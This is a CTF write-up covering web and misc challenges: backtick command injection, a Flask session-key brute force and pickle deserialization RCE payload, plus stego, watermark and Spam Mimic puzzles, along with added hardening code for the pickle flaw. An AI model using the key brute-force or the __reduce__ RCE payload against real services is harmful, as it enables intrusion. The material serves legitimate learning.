web
What the cow say?

Inside the container there is an input box. After trying SSTI, command execution, code execution and so on, it turns out that commands can be executed with backticks. Entering nl app.py shows the source code, which contains the concrete implementation of the feature and the filtering.

The flag is in /flag_is_here home/flag_c0w54y; execute a command there to obtain the flag.

myflask
Visiting the challenge URL returns the app.py source code:
```python
# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)


@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')


@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data = base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata = pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'


if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')
```

Analysing the source: the / route lets you download app.py. The /flag route checks whether a session exists; if it does, it prints the corresponding username. If the session username is admin, the POST data is passed to pickle.loads, which is an obvious pickle deserialization vulnerability.
First the session has to be forged. The secret key is the hour, minute and second of the server's start time joined together: a session obtained at 10:10:10 means the key is 101010. Write a script that brute-forces the 60 seconds of the minute in which the session was obtained.

Start the environment, visit the / route and note the time, e.g. 13:25. Visit /flag; at this point you are the guest user. The Python version is 3, so use flask_session_cookie_manager3.py to forge the session. Write a script to brute-force the session key: the recorded time is 13:25, so brute-force 132500 to 132559.
```python
# 1.py
import os

for k in range(0, 60):
    # candidate key: HHMM recorded above plus the two-digit second
    if k < 10:
        secret = "13250" + str(k)
    else:
        secret = "1325" + str(k)
    c = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bc"
    print(os.popen(f"python flask_session_cookie_manager3.py decode -s {secret} -c {c}").read(), end="")
    print("*****" + secret)
```

Forge the session with the recovered key and replace the site's session cookie; you are now the admin user and can reach the pickle deserialization. Construct the payload:
```python
import pickle
import base64


class Flag(object):
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat /flag').read()",))


flag = Flag()
print(base64.b64encode(pickle.dumps(flag)))
# payload
# pickle_data=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu
```
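The two defects this challenge is built on are a guessable SECRET_KEY and pickle.loads on user input. The following block is an added example, not part of the challenge or the writeup, showing the hardened counterpart of each: a random key, a check that flags time-derived keys, and a restricted unpickler that refuses any global reference so a __reduce__ payload like the one above can never call a function. The names RestrictedUnpickler, safe_loads, key_is_weak and CallsAGlobal are assumptions for this example, and CallsAGlobal deliberately points at the harmless builtin len.

```python
import io
import pickle
import secrets


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup.

    pickle's code-execution primitive is a GLOBAL/STACK_GLOBAL opcode that
    resolves a callable (eval, os.popen, ...) and then calls it with
    attacker-chosen arguments. Raising here leaves only plain data
    (int, str, bytes, list, dict, tuple, ...) loadable.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Drop-in replacement for pickle.loads that cannot call any function."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if safe_loads refuses the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def make_secret_key(nbytes: int = 32) -> bytes:
    """Random session key; replaces app.config['SECRET_KEY'] = currentTime."""
    return secrets.token_bytes(nbytes)


def key_is_weak(key) -> bool:
    """Flag a SECRET_KEY that a time-based brute force could recover.

    Six digits (HHMMSS) give at most 86,400 candidates, and only 60 once the
    minute is known, which is exactly what the 1.py loop above relies on.
    """
    if isinstance(key, bytes):
        key = key.decode("latin-1")
    return len(key) < 16 or key.isdigit()


class CallsAGlobal:
    """Constructed sample: a pickle that references a global, like the
    exploit's Flag class, but pointing at the harmless builtin len."""

    def __reduce__(self):
        return (len, ("abc",))


def sample_plain() -> bytes:
    """Constructed sample: the kind of data the /flag route should accept."""
    return pickle.dumps({"username": "guest", "n": 1})


def sample_global() -> bytes:
    """Constructed sample: a pickle carrying a global reference."""
    return pickle.dumps(CallsAGlobal())


if __name__ == "__main__":
    print(key_is_weak("132530"), key_is_weak(make_secret_key()))  # True False
    print(safe_loads(sample_plain()))
    print(is_rejected(sample_global()), is_rejected(sample_plain()))  # True False
```

The restricted unpickler is the approach documented in the Python standard library's pickle docs; the safer fix is to not accept pickle from clients at all and use JSON with explicit validation, since even plain data pickles can be abused for resource exhaustion.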
Submit the payload; the pickle deserialization triggers RCE and returns the flag.

misc
ek1ng_want_girlfriend
Traffic analysis: open the capture in Wireshark and filter on http; there is an image ek1ng.jpg. Select the response to the image request (241 HTTP/1.0 200 OK), choose File > Export Objects > HTTP, export ek1ng.jpg and save it. Opening the exported image shows the flag at the bottom of the picture.

龙之舞
Download the attachment deepsound_of_dragon_dance.wav. The file name suggests DeepSound steganography; opening it in the tool shows that a password is required. Load the file into Audacity and view the spectrogram: there is hidden data, which has to be flipped vertically to read. It says KEY : 5H8w1nlWCX3hQLG. Using 5H8w1nlWCX3hQLG as the DeepSound password extracts the hidden archive. The archive contains a GIF; frames 55, 121, 153 and 232 each hold one quarter of a QR code. Stitch the four fragments together, repair the QR code and scan it to get the flag.
ezWord
The attachment is a Word document. Rename the extension to zip and extract it; the word/media directory contains four files. Together with the challenge description ("crack the watermark in the picture to unlock the secret in the document") this indicates the two images are a blind-watermark pair. Extracting the blind watermark with the blindwatermark tool gives T1hi3sI4sKey, which according to the hint in 恭喜.txt is the archive password.
```
# Blind watermark extraction
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png
# blindwatermark tool download
https://github.com/chishaxie/BlindWaterMark
```

Unzip secret.zip with the password T1hi3sI4sKey. secret.txt contains the following English text:
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But dont believe
us . Ms Simpson who resides in Maine tried us and says
Ive been poor and Ive been rich - rich is better
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and youll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But dont believe us . Mrs Simpson of Illinois tried
us and says Now Im rich many more things are possible
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more SELL MORE . You can begin
at absolutely no cost to you . But dont believe us
. Mr Jones of Minnesota tried us and says I was skeptical
but it worked for me ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and youll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else youve seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customers
doorstep turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But dont
believe us . Ms Anderson who resides in New York tried
us and says My only problem now is where to park all
my cars ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and youll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of REMOVE and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But dont
believe us . Mrs Anderson of Indiana tried us and says
Now Im rich, Rich, RICH . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customers doorstep
. You can begin at absolutely no cost to you . But
dont believe us ! Mrs Simpson of Illinois tried us
and says I was skeptical but it worked for me . We
are licensed to operate in all states ! Because the
Internet operates on Internet time you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But dont believe us ! Mrs Anderson who
resides in Alabama tried us and says Now Im rich,
Rich, RICH ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But dont
believe us ! Prof Ames who resides in Washington tried
us and says I was skeptical but it worked for me
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and youll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of REMOVE and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS SELL MORE . You can begin at absolutely
no cost to you ! But dont believe us . Mr Ames of
Louisiana tried us and says Now Im rich, Rich, RICH
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and youll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .
Searching shows this is a Cardan-grille style encoding, Spam Mimic. Decoding it on the online site spammimic - decode gives the following Chinese characters:
籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆
Converting the characters to Unicode code points gives the hex string 71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86. Comparing the first few bytes with the ASCII codes of hgame shows each one is larger by 9, so a script recovers the flag:
```python
a = "71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86"
flag = ""
for i in range(0, len(a), 2):
    # each byte is the ASCII code of the flag character plus 9
    flag += chr(int(a[i:i + 2], 16) - 9)
print(flag)  # hgame{0k_you_s0lve_al1_th3_secr3t}
```
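The script above hard-codes both the hex string and the shift of 9. As an added example, not part of the original writeup, the block below works directly on the decoded Spam Mimic characters and generalizes the last step: it takes the low byte of each code point (which is how the writeup's hex string was produced), searches for the constant shift that turns the first bytes into the expected flag prefix hgame{, and only then decodes the whole string. The function names and the printable-ASCII check are assumptions of this example.

```python
from typing import Optional

# The characters obtained from spammimic (copied from the writeup).
CIPHERTEXT = "籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆"


def low_bytes(text: str) -> bytes:
    """Low byte of each code point: the 'hex number' the writeup works with."""
    return bytes(ord(c) & 0xFF for c in text)


def to_hex(text: str) -> str:
    """Same hex string the writeup derives by hand."""
    return low_bytes(text).hex()


def decode_with_shift(text: str, shift: int) -> str:
    """Subtract a constant from every low byte and read the result as ASCII.

    Raises ValueError if any byte leaves printable ASCII, which is how a
    wrong shift shows itself instead of producing silent garbage.
    """
    out = []
    for b in low_bytes(text):
        v = b - shift
        if not 0x20 <= v < 0x7F:
            raise ValueError(f"byte {b:#x} minus {shift} is not printable ASCII")
        out.append(chr(v))
    return "".join(out)


def find_shift(text: str, prefix: str = "hgame{") -> Optional[int]:
    """Return the shift that maps the first bytes onto `prefix`, else None."""
    head = low_bytes(text)[: len(prefix)]
    if len(head) < len(prefix):
        return None
    for shift in range(256):
        if all(b - shift == ord(p) for b, p in zip(head, prefix)):
            return shift
    return None


def recover_flag(text: str = CIPHERTEXT, prefix: str = "hgame{") -> Optional[str]:
    """Full pipeline: find the shift from the known prefix, then decode."""
    shift = find_shift(text, prefix)
    if shift is None:
        return None
    return decode_with_shift(text, shift)


if __name__ == "__main__":
    print(to_hex(CIPHERTEXT))
    print(find_shift(CIPHERTEXT))  # 9
    print(recover_flag())  # hgame{0k_you_s0lve_al1_th3_secr3t}
```

Because the prefix search checks every candidate shift against the known flag format, the same function works for other CTFs that use a different constant or a different prefix.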